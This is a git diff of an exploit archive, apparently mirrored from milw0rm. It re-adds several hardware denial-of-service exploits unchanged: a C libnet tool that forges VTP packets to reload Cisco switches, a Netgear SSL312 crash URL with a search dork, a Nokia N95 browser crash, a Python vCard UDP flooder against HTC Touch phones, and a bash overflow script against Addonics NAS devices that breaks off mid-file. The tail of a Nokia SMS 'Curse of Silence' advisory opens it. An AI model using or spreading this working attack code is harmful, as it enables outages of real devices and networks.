+ +The simplest form of content for a Curse Of Silence would be something +like "123456789@123456789.1234567890123 " (the digits are used only to +illustrate the length of the "email address" of more than 32 +characters). Note the space at the end of the message! + + +Workaround +========== + +None known for the user side. + +Until a firmware fix is available, network operators should filter +messages with TP-PID "Internet Electronic Mail" and an email address +of more than 32 characters or reset the TP-PID of these messages to 0. + + +Credits +======= + +Tobias Engel +November 9, 2008 + +Many thanks to Frank Rieger for spending countless hours cutting and +editing the video. + + +Detailed List of Affected Products +================================== + +Tested on several S60 2.6, 3.0 and 3.1 devices. Since the vulnerable +component is a S60 base functionality, it seems safe to assume that +all devices with these OS versions are affected. + +S60 3rd Edition, Feature Pack 1 (S60 3.1): +Nokia E90 Communicator +Nokia E71 +Nokia E66 +Nokia E51 +Nokia N95 8GB +Nokia N95 +Nokia N82 +Nokia N81 8GB +Nokia N81 +Nokia N76 +Nokia 6290 +Nokia 6124 classic +Nokia 6121 classic +Nokia 6120 classic +Nokia 6110 Navigator +Nokia 5700 XpressMusic + +S60 3rd Edition, initial release (S60 3.0): +Nokia E70 +Nokia E65 +Nokia E62 +Nokia E61i +Nokia E61 +Nokia E60 +Nokia E50 +Nokia N93i +Nokia N93 +Nokia N92 +Nokia N91 8GB +Nokia N91 +Nokia N80 +Nokia N77 +Nokia N73 +Nokia N71 +Nokia 5500 +Nokia 3250 + +S60 2nd Edition, Feature Pack 3 (S60 2.8): +Nokia N90 +Nokia N72 +Nokia N70 + +S60 2nd Edition, Feature Pack 2 (S60 2.6): +Nokia 6682 +Nokia 6681 +Nokia 6680 +Nokia 6630 + + +Change History +============== + +December 30, 2008: +Removed auth details since they are no longer required + +December 21, 2008: +Corrected version numbers for S60 2nd Edition + +December 13, 2008: +S60 2.8 devices react like S60 3.1 devices, not like S60 2.6 or 3.0 +devices + +# milw0rm.com [2009-01-01] diff --git a/platforms/hardware/dos/7776.c b/platforms/hardware/dos/7776.c index 295e9e47b..c575e86ad 100755 --- a/platforms/hardware/dos/7776.c +++ b/platforms/hardware/dos/7776.c @@ -1,188 +1,188 @@ -/*DoS code for Cisco VLAN Trunking Protocol Vulnerability - * - *vulerability discription: - *http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml - * - *To Known: - * 1.the switch must in Server/Client Mode. - * 2.the port ,attacker connected,must be in trunk Mode. - * Cisco Ethernet ports with no configuration are not - * in trunk.but trunk mode can be obtained through DTP - * attack by Yersinia. - * 3.you must known the vtp domain,this can be sniffed - * 4.some codes are from Yersinia. - * - *Result: - * switch reload. - * - * - *Compile: - * gcc -o vtp `libnet-config --libs` vtp.c - * - *Usage:vtp -i -d - * - *Contact: showrun.lee[AT]gmail.com - *http://sh0wrun.blogspot.com/ - */ -#include -#include -#include - -#define VTP_DOMAIN_SIZE 32 -#define VTP_TIMESTAMP_SIZE 12 - -struct vtp_summary { - u_int8_t version; - u_int8_t code; - u_int8_t followers; - u_int8_t dom_len; - u_int8_t domain[VTP_DOMAIN_SIZE]; - u_int32_t revision; - u_int32_t updater; - u_int8_t timestamp[VTP_TIMESTAMP_SIZE]; - u_int8_t md5[16]; -}; - -struct vtp_subset { - u_int8_t version; - u_int8_t code; - u_int8_t seq; - u_int8_t dom_len; - u_int8_t domain[VTP_DOMAIN_SIZE]; - u_int32_t revision; -}; - -void usage( char *s) { - printf("%s -i -d \n",s); - exit (1); -} - -int main( int argc, char *argv[] ) -{ - int opt,k=0; - extern char *optarg; - libnet_ptag_t t; - libnet_t *lhandler; - u_int32_t vtp_len=0, sent; - struct vtp_summary *vtp_summ; - struct vtp_subset *vtp_sub; - u_int8_t *vtp_packet,*vtp_packet2, *aux; - u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 }; - u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc }; - u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00, 0x00,0x00 }; - struct libnet_ether_addr *mymac; - char *device; - char error_information[LIBNET_ERRBUF_SIZE]; - char *domain; - -// get options - while ((opt = getopt(argc, argv, "i:d:")) != -1) - { - switch (opt) { - case 'i': - device=malloc(strlen(optarg)); - strcpy(device,optarg); - k=1; - break; - - case 'd': - domain=malloc(strlen(optarg)); - strcpy(domain,optarg); - break; - - default: usage(argv[0]); - } - } - if(!k) { printf(" %s -i -d \n must assign the interface\n",argv[0]);exit(1);} - -//init libnet - - lhandler=libnet_init(LIBNET_LINK,device,error_information); - if (!lhandler) { - fprintf(stderr, "libnet_init: %s\n", error_information); - return -1; - } - - mymac=libnet_get_hwaddr(lhandler); -//build the first packet for vtp_summary - vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary); - vtp_packet = calloc(1,vtp_len); - aux = vtp_packet; - memcpy(vtp_packet,cisco_data,sizeof(cisco_data)); - aux+=sizeof(cisco_data); - vtp_summ = (struct vtp_summary *)aux; - vtp_summ->version = 0x01; - vtp_summ->code = 0x01;//vtp_summary - vtp_summ->followers = 0x01; - vtp_summ->dom_len = strlen(domain); - memcpy(vtp_summ->domain,domain,strlen(domain)); - vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok - t = libnet_build_802_2( - 0xaa, /* DSAP */ - 0xaa, /* SSAP */ - 0x03, /* control */ - vtp_packet, /* payload */ - vtp_len, /* payload size */ - lhandler, /* libnet handle */ - 0); /* libnet id */ - t = libnet_build_802_3( - dst_mac, /* ethernet destination */ - mymac->ether_addr_octet, /* ethernet source */ - LIBNET_802_2_H + vtp_len, /* frame size */ - NULL, /* payload */ - 0, /* payload size */ - lhandler, /* libnet handle */ - 0); /* libnet id */ - - sent = libnet_write(lhandler); - - if (sent == -1) { - libnet_clear_packet(lhandler); - free(vtp_packet); - return -1; - } - libnet_clear_packet(lhandler); - -//build the second vtp packet for vtp_subset - vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset); - vtp_packet2 = calloc(1,vtp_len); - aux = vtp_packet2; - memcpy(vtp_packet2,cisco_data,sizeof(cisco_data)); - aux+=sizeof(cisco_data); - - vtp_sub = (struct vtp_subset *)aux; - vtp_sub->version = 0x01; - vtp_sub->code = 0x02; //vtp_subset - vtp_sub->seq = 0x01; - vtp_sub->dom_len = strlen(domain); - memcpy(vtp_sub->domain,domain,strlen(domain)); - vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok -// memcpy(vtp_sub->aaa,aaa,strlen(aaa)); - - t = libnet_build_802_2( - 0xaa, /* DSAP */ - 0xaa, /* SSAP */ - 0x03, /* control */ - vtp_packet2, /* payload */ - vtp_len, /* payload size */ - lhandler, /* libnet handle */ - 0); /* libnet id */ - t = libnet_build_802_3( - dst_mac, /* ethernet destination */ - mymac->ether_addr_octet, /* ethernet source */ - LIBNET_802_2_H + vtp_len, /* frame size */ - NULL, /* payload */ - 0, /* payload size */ - lhandler, /* libnet handle */ - 0); /* libnet id */ - - sent = libnet_write(lhandler); - if (sent == -1) { - libnet_clear_packet(lhandler); - free(vtp_packet); - return -1; - } - libnet_clear_packet(lhandler); -} - -// milw0rm.com [2009-01-14] +/*DoS code for Cisco VLAN Trunking Protocol Vulnerability + * + *vulerability discription: + *http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml + * + *To Known: + * 1.the switch must in Server/Client Mode. + * 2.the port ,attacker connected,must be in trunk Mode. + * Cisco Ethernet ports with no configuration are not + * in trunk.but trunk mode can be obtained through DTP + * attack by Yersinia. + * 3.you must known the vtp domain,this can be sniffed + * 4.some codes are from Yersinia. + * + *Result: + * switch reload. + * + * + *Compile: + * gcc -o vtp `libnet-config --libs` vtp.c + * + *Usage:vtp -i -d + * + *Contact: showrun.lee[AT]gmail.com + *http://sh0wrun.blogspot.com/ + */ +#include +#include +#include + +#define VTP_DOMAIN_SIZE 32 +#define VTP_TIMESTAMP_SIZE 12 + +struct vtp_summary { + u_int8_t version; + u_int8_t code; + u_int8_t followers; + u_int8_t dom_len; + u_int8_t domain[VTP_DOMAIN_SIZE]; + u_int32_t revision; + u_int32_t updater; + u_int8_t timestamp[VTP_TIMESTAMP_SIZE]; + u_int8_t md5[16]; +}; + +struct vtp_subset { + u_int8_t version; + u_int8_t code; + u_int8_t seq; + u_int8_t dom_len; + u_int8_t domain[VTP_DOMAIN_SIZE]; + u_int32_t revision; +}; + +void usage( char *s) { + printf("%s -i -d \n",s); + exit (1); +} + +int main( int argc, char *argv[] ) +{ + int opt,k=0; + extern char *optarg; + libnet_ptag_t t; + libnet_t *lhandler; + u_int32_t vtp_len=0, sent; + struct vtp_summary *vtp_summ; + struct vtp_subset *vtp_sub; + u_int8_t *vtp_packet,*vtp_packet2, *aux; + u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 }; + u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc }; + u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00, 0x00,0x00 }; + struct libnet_ether_addr *mymac; + char *device; + char error_information[LIBNET_ERRBUF_SIZE]; + char *domain; + +// get options + while ((opt = getopt(argc, argv, "i:d:")) != -1) + { + switch (opt) { + case 'i': + device=malloc(strlen(optarg)); + strcpy(device,optarg); + k=1; + break; + + case 'd': + domain=malloc(strlen(optarg)); + strcpy(domain,optarg); + break; + + default: usage(argv[0]); + } + } + if(!k) { printf(" %s -i -d \n must assign the interface\n",argv[0]);exit(1);} + +//init libnet + + lhandler=libnet_init(LIBNET_LINK,device,error_information); + if (!lhandler) { + fprintf(stderr, "libnet_init: %s\n", error_information); + return -1; + } + + mymac=libnet_get_hwaddr(lhandler); +//build the first packet for vtp_summary + vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary); + vtp_packet = calloc(1,vtp_len); + aux = vtp_packet; + memcpy(vtp_packet,cisco_data,sizeof(cisco_data)); + aux+=sizeof(cisco_data); + vtp_summ = (struct vtp_summary *)aux; + vtp_summ->version = 0x01; + vtp_summ->code = 0x01;//vtp_summary + vtp_summ->followers = 0x01; + vtp_summ->dom_len = strlen(domain); + memcpy(vtp_summ->domain,domain,strlen(domain)); + vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok + t = libnet_build_802_2( + 0xaa, /* DSAP */ + 0xaa, /* SSAP */ + 0x03, /* control */ + vtp_packet, /* payload */ + vtp_len, /* payload size */ + lhandler, /* libnet handle */ + 0); /* libnet id */ + t = libnet_build_802_3( + dst_mac, /* ethernet destination */ + mymac->ether_addr_octet, /* ethernet source */ + LIBNET_802_2_H + vtp_len, /* frame size */ + NULL, /* payload */ + 0, /* payload size */ + lhandler, /* libnet handle */ + 0); /* libnet id */ + + sent = libnet_write(lhandler); + + if (sent == -1) { + libnet_clear_packet(lhandler); + free(vtp_packet); + return -1; + } + libnet_clear_packet(lhandler); + +//build the second vtp packet for vtp_subset + vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset); + vtp_packet2 = calloc(1,vtp_len); + aux = vtp_packet2; + memcpy(vtp_packet2,cisco_data,sizeof(cisco_data)); + aux+=sizeof(cisco_data); + + vtp_sub = (struct vtp_subset *)aux; + vtp_sub->version = 0x01; + vtp_sub->code = 0x02; //vtp_subset + vtp_sub->seq = 0x01; + vtp_sub->dom_len = strlen(domain); + memcpy(vtp_sub->domain,domain,strlen(domain)); + vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok +// memcpy(vtp_sub->aaa,aaa,strlen(aaa)); + + t = libnet_build_802_2( + 0xaa, /* DSAP */ + 0xaa, /* SSAP */ + 0x03, /* control */ + vtp_packet2, /* payload */ + vtp_len, /* payload size */ + lhandler, /* libnet handle */ + 0); /* libnet id */ + t = libnet_build_802_3( + dst_mac, /* ethernet destination */ + mymac->ether_addr_octet, /* ethernet source */ + LIBNET_802_2_H + vtp_len, /* frame size */ + NULL, /* payload */ + 0, /* payload size */ + lhandler, /* libnet handle */ + 0); /* libnet id */ + + sent = libnet_write(lhandler); + if (sent == -1) { + libnet_clear_packet(lhandler); + free(vtp_packet); + return -1; + } + libnet_clear_packet(lhandler); +} + +// milw0rm.com [2009-01-14] diff --git a/platforms/hardware/dos/8008.txt b/platforms/hardware/dos/8008.txt index 4e6234c00..68068de17 100755 --- a/platforms/hardware/dos/8008.txt +++ b/platforms/hardware/dos/8008.txt @@ -1,73 +1,73 @@ - _ _ _____ _ ___ _____ _ _ - / / / / ____/ / / _/_ __/ / / / - / /_/ / __/ / / / / / / / /_/ / - / __ / /___/ /____/ / / / / __ / - /_/ /_/_____/_____/___/ /_/ /_/ /_/ - Helith - 0815 --------------------------------------------------------------------------------- - -Author : Rembrandt -Date : 2008-02-27 -Affected Software: propietary CGI -Affected OS : Netgear embedded Linux for the SSL312 router - Propably other devices are affected as well -Type : Denial of Service - -OSVDB : -Milw0rm : 8008 -CVE : -ISS X-Force: : -BID : 33675 - - -Trying to fix it responsible and get in contact with the vendor: - --- ZDI -- -Case Opened 2008-12-28 07:57 GMT-6 -Case Closed 2009-01-15 17:01 GMT-6 - -"After some deliberation we have unfortunately decided that we won't be -accepting bugs affecting NetGear products." --- END -- - -Contacting Netgear and mitre.org: 2009-02-01 12:25 GTM+1 -No reaction, release : 2009-02-06 23:59 GTM+1 - -Netgear VPN router SSL312 is proune to a remote DoS condition which can get -triggered if somebody has access to the webinterface of the VPN router. -The problem is related to a propietary CGI binary and makes is impossible -for users to patch the router. Further in detail analyses will show several -other issues like outdated third party software (e.g. the webserver) and further -problems in the cgi-binary itself which won't get disclosed here. - -If you download the source code the affected binary can be found at: -./NG_SSL312-GPL/uClinux/uC-src/real/EasyAccess/EasyAccess/www/cgi-bin/single_cgi - - -Steps to reproduce: - -Visit the Netgear SSL312 VPN router webinterface. -You will see a login field and a password field. -Just enter any random data and proceed. - -The URL will include a path like: -https://xxx.xxx.xxx.xxx/cgi-bin/welcome/VPN_only?err=VXNlciBMb2dpbiBGYWlsZWQ= - -If you modify the URL as below and resend your http request the device will -crash and needs a hard reboot. - -https://xxx.xxx.xxx.xxx/cgi-bin/welcome/VPN_only?../../../../../ - -Example network affected by this: StudiVZ - -Simple google dork: -intitle:SSL-VPN intext:password inurl:/cgi-bin/welcome - -Workaround: -Preventing others to gain access to the webinterface of the router prevents -the attack. - -Kind regards, -Rembrandt - -# milw0rm.com [2009-02-09] + _ _ _____ _ ___ _____ _ _ + / / / / ____/ / / _/_ __/ / / / + / /_/ / __/ / / / / / / / /_/ / + / __ / /___/ /____/ / / / / __ / + /_/ /_/_____/_____/___/ /_/ /_/ /_/ + Helith - 0815 +-------------------------------------------------------------------------------- + +Author : Rembrandt +Date : 2008-02-27 +Affected Software: propietary CGI +Affected OS : Netgear embedded Linux for the SSL312 router + Propably other devices are affected as well +Type : Denial of Service + +OSVDB : +Milw0rm : 8008 +CVE : +ISS X-Force: : +BID : 33675 + + +Trying to fix it responsible and get in contact with the vendor: + +-- ZDI -- +Case Opened 2008-12-28 07:57 GMT-6 +Case Closed 2009-01-15 17:01 GMT-6 + +"After some deliberation we have unfortunately decided that we won't be +accepting bugs affecting NetGear products." +-- END -- + +Contacting Netgear and mitre.org: 2009-02-01 12:25 GTM+1 +No reaction, release : 2009-02-06 23:59 GTM+1 + +Netgear VPN router SSL312 is proune to a remote DoS condition which can get +triggered if somebody has access to the webinterface of the VPN router. +The problem is related to a propietary CGI binary and makes is impossible +for users to patch the router. Further in detail analyses will show several +other issues like outdated third party software (e.g. the webserver) and further +problems in the cgi-binary itself which won't get disclosed here. + +If you download the source code the affected binary can be found at: +./NG_SSL312-GPL/uClinux/uC-src/real/EasyAccess/EasyAccess/www/cgi-bin/single_cgi + + +Steps to reproduce: + +Visit the Netgear SSL312 VPN router webinterface. +You will see a login field and a password field. +Just enter any random data and proceed. + +The URL will include a path like: +https://xxx.xxx.xxx.xxx/cgi-bin/welcome/VPN_only?err=VXNlciBMb2dpbiBGYWlsZWQ= + +If you modify the URL as below and resend your http request the device will +crash and needs a hard reboot. + +https://xxx.xxx.xxx.xxx/cgi-bin/welcome/VPN_only?../../../../../ + +Example network affected by this: StudiVZ + +Simple google dork: +intitle:SSL-VPN intext:password inurl:/cgi-bin/welcome + +Workaround: +Preventing others to gain access to the webinterface of the router prevents +the attack. + +Kind regards, +Rembrandt + +# milw0rm.com [2009-02-09] diff --git a/platforms/hardware/dos/8051.html b/platforms/hardware/dos/8051.html index 740526761..8f5867ff6 100755 --- a/platforms/hardware/dos/8051.html +++ b/platforms/hardware/dos/8051.html @@ -1,41 +1,41 @@ -Application: Nokia N95-8 -OS: Symbian ------------------------------------------------------- -1 - Description -2 - Vulnerability -3 - POC/EXPLOIT - ------------------------------------------------------- -Description - -The nokia n95 is a smartphone, this phone have more tools, for example: gps,mp3,camera,wireless. - - :) - ------------------------------------------------------- -Vulnerability - -The vulnerability is caused when the browser, opened a web with javaScript code. This cause that page crash. - -The error is in the method "setAttributeNode", because the bad implement is the cause of bug. - ------------------------------------------------------- -POC/EXPLOIT - -Enter in this url - -http://es.geocities.com/jplopezy/nokiacrash2.html - - -or make html file and insert this code - - - - ------------------------------------------------------- -Juan Pablo Lopez Yacubian - -# milw0rm.com [2009-02-13] +Application: Nokia N95-8 +OS: Symbian +------------------------------------------------------ +1 - Description +2 - Vulnerability +3 - POC/EXPLOIT + +------------------------------------------------------ +Description + +The nokia n95 is a smartphone, this phone have more tools, for example: gps,mp3,camera,wireless. + + :) + +------------------------------------------------------ +Vulnerability + +The vulnerability is caused when the browser, opened a web with javaScript code. This cause that page crash. + +The error is in the method "setAttributeNode", because the bad implement is the cause of bug. + +------------------------------------------------------ +POC/EXPLOIT + +Enter in this url + +http://es.geocities.com/jplopezy/nokiacrash2.html + + +or make html file and insert this code + + + + +------------------------------------------------------ +Juan Pablo Lopez Yacubian + +# milw0rm.com [2009-02-13] diff --git a/platforms/hardware/dos/8125.rb b/platforms/hardware/dos/8125.rb index 1348fe361..a0282eeb1 100755 --- a/platforms/hardware/dos/8125.rb +++ b/platforms/hardware/dos/8125.rb @@ -1,122 +1,122 @@ -#! /usr/bin/env python -# -# Copyright (c) 2009 Mobile Security Lab www.mseclab.com -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in -# all copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# - -from socket import * -from sys import exit,argv -from time import * -import random -from optparse import OptionParser - -# Global Variables -PORT = 9204 -DEF_NUM_PACKETS = 10 -DEF_VCARD_LEN = 1410 -DEF_DELAY = 0.7 -VCARD_HEADER = "BEGIN:VCARD\r\nVERSION:2.1\r\nN:" -VCARD_TRAILER = "\r\nEND:VCARD\r\n" - -def main(): - # Local variables - num_packets = DEF_NUM_PACKETS - delay = DEF_DELAY - - print "\nMSL-2008-002 PoC for HTC Touch\nMobile Security Lab 2009\n" - # Parsing options - parser = OptionParser("usage: %prog [options] target_IP") - parser.add_option("-s", "--silence", action="store_true", dest="silence", help="send silent vcards (32k)") - parser.add_option("-c", "--count", type="int", help="specify vcard length", dest="count") - parser.add_option("-d", "--delay", type="float", help="specify delay between packets", dest="delay") - parser.add_option("-l", "--len", type="int", help="specify vcard length", dest="len") - parser.add_option("-t", "--text", type="string", help="specify vcard body text", dest="text") - - # Parse input - (options, args) = parser.parse_args() - if len(args) != 1: - parser.print_help() - print "" - exit(1) - - if options.count: - num_packets = options.count - - if options.delay: - delay = options.delay - - if options.silence: - vcard_body = VCARD_HEADER+'A' *32722+VCARD_TRAILER - elif options.len: - vcard_body = VCARD_HEADER+'A' *options.len+VCARD_TRAILER - elif options.text: - vcard_body = VCARD_HEADER+options.text+VCARD_TRAILER - else: - vcard_body = VCARD_HEADER+'A' *DEF_VCARD_LEN+VCARD_TRAILER - - # Socket creation - udp_sock = socket(AF_INET, SOCK_DGRAM) - ADDR = (args[0],PORT) - - # Start sending packet - counter = 1 - c_lap = 0 - total_data = 0 - print "Sending %d packets... to %s" % (num_packets,ADDR) - start_time = time() - start_lap = time() - - # Start sending packet - while counter <= num_packets: - len_sent = udp_sock.sendto(vcard_body,ADDR) - if len_sent != len(vcard_body): - print "Error sending packet n.%d" %counter - break - - # Update Counter - counter += 1 - c_lap += 1 - total_data += len_sent - - # Sleep for letting the device parse vcards - sleep(delay) - - # Check number of packets in a second - local_lap = time() - if local_lap - start_lap >= 1: - print "%0.2f packets/sec" % (c_lap/(local_lap - start_lap)) - start_lap = local_lap - c_lap = 0 - - stop_time = time() - stop_sec = stop_time - start_time - - # Display info - print "Sent %d packets in %f seconds" % (num_packets, stop_sec) - print "Start time: %s" %ctime(start_time) - print "Stop time: %s" %ctime(stop_time) - print "Payload Len = %d bytes" % len(vcard_body) - print "Total Data sent = %d bytes (about %0.2f kB)" % (total_data, (float(total_data)/float(1024))) - -#Global start -if __name__ == "__main__": - main() - -# milw0rm.com [2009-03-02] +#! /usr/bin/env python +# +# Copyright (c) 2009 Mobile Security Lab www.mseclab.com +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. +# + +from socket import * +from sys import exit,argv +from time import * +import random +from optparse import OptionParser + +# Global Variables +PORT = 9204 +DEF_NUM_PACKETS = 10 +DEF_VCARD_LEN = 1410 +DEF_DELAY = 0.7 +VCARD_HEADER = "BEGIN:VCARD\r\nVERSION:2.1\r\nN:" +VCARD_TRAILER = "\r\nEND:VCARD\r\n" + +def main(): + # Local variables + num_packets = DEF_NUM_PACKETS + delay = DEF_DELAY + + print "\nMSL-2008-002 PoC for HTC Touch\nMobile Security Lab 2009\n" + # Parsing options + parser = OptionParser("usage: %prog [options] target_IP") + parser.add_option("-s", "--silence", action="store_true", dest="silence", help="send silent vcards (32k)") + parser.add_option("-c", "--count", type="int", help="specify vcard length", dest="count") + parser.add_option("-d", "--delay", type="float", help="specify delay between packets", dest="delay") + parser.add_option("-l", "--len", type="int", help="specify vcard length", dest="len") + parser.add_option("-t", "--text", type="string", help="specify vcard body text", dest="text") + + # Parse input + (options, args) = parser.parse_args() + if len(args) != 1: + parser.print_help() + print "" + exit(1) + + if options.count: + num_packets = options.count + + if options.delay: + delay = options.delay + + if options.silence: + vcard_body = VCARD_HEADER+'A' *32722+VCARD_TRAILER + elif options.len: + vcard_body = VCARD_HEADER+'A' *options.len+VCARD_TRAILER + elif options.text: + vcard_body = VCARD_HEADER+options.text+VCARD_TRAILER + else: + vcard_body = VCARD_HEADER+'A' *DEF_VCARD_LEN+VCARD_TRAILER + + # Socket creation + udp_sock = socket(AF_INET, SOCK_DGRAM) + ADDR = (args[0],PORT) + + # Start sending packet + counter = 1 + c_lap = 0 + total_data = 0 + print "Sending %d packets... to %s" % (num_packets,ADDR) + start_time = time() + start_lap = time() + + # Start sending packet + while counter <= num_packets: + len_sent = udp_sock.sendto(vcard_body,ADDR) + if len_sent != len(vcard_body): + print "Error sending packet n.%d" %counter + break + + # Update Counter + counter += 1 + c_lap += 1 + total_data += len_sent + + # Sleep for letting the device parse vcards + sleep(delay) + + # Check number of packets in a second + local_lap = time() + if local_lap - start_lap >= 1: + print "%0.2f packets/sec" % (c_lap/(local_lap - start_lap)) + start_lap = local_lap + c_lap = 0 + + stop_time = time() + stop_sec = stop_time - start_time + + # Display info + print "Sent %d packets in %f seconds" % (num_packets, stop_sec) + print "Start time: %s" %ctime(start_time) + print "Stop time: %s" %ctime(stop_time) + print "Payload Len = %d bytes" % len(vcard_body) + print "Total Data sent = %d bytes (about %0.2f kB)" % (total_data, (float(total_data)/float(1024))) + +#Global start +if __name__ == "__main__": + main() + +# milw0rm.com [2009-03-02] diff --git a/platforms/hardware/dos/8187.sh b/platforms/hardware/dos/8187.sh index 70af66c31..bfea18c97 100755 --- a/platforms/hardware/dos/8187.sh +++ b/platforms/hardware/dos/8187.sh @@ -1,68 +1,68 @@ -#!/bin/bash -###################################################### -# Addonics NAS Adapter Post-Auth DoS -# Tested against R3282-1.33c LOADER32 1.15, and NASU2FW41 Loader 1.17 -# Coded by Mike Cyr, aka h00die -# mcyr2 at csc dot_____________com -# Notes: Any of these BoF crashes the entire stack from the web GUI -# so throw a GET, and bye bye baby! -# Greetz to muts and loganWHD, I tried harder -# http://www.offensive-security.com/offsec101.php turning script kiddies into ninjas daily -# Log: Vendor notification feb 9, 2009 for BoF in R3282-1.33c LOADER32 1.15 firmware -# March 8, 2009: Second vendor notification for BoF in NASU2FW41 Loader 1.17 firmware -# March 9, 2009: Code release on Milw0rm, Bid sent. -###################################################### - -echo "Addonics NAS Adapter Post-Auth DoS" -echo "Written by H00die" - -echo "------------------------" -echo "Addonics IP:" -read -e IP -echo "Addonics GUI Username:" -read -e USERNAME -echo "Addonics GUI Password:" -read -e PASSWORD - -echo "-----------------------" -echo "Select Buffer:" -echo "1. FTP: Username (R3282-1.33c LOADER32 1.15)" -echo "2. FTP: Password (R3282-1.33c LOADER32 1.15)" -echo "3. SMB: Username (R3282-1.33c LOADER32 1.15)" -echo "4. SMB: Password (R3282-1.33c LOADER32 1.15, NASU2FW41 Loader 1.17)" -echo "5. FTP: Username (NASU2FW41 Loader 1.17)" -echo "6. FTP: Password (NASU2FW41 Loader 1.17)" -echo "7. SMB: Username (NASU2FW41 Loader 1.17)" - -read -e BOF - -echo "" -echo "-----------------------" -echo "Sending Malicious GET request" -case "$BOF" in -'1') -wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&Account_passwd=a&ftp_att=W;" -;; -'2') -wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=a&Account_passwd=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&ftp_att=W;" -;; -'3') -wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD 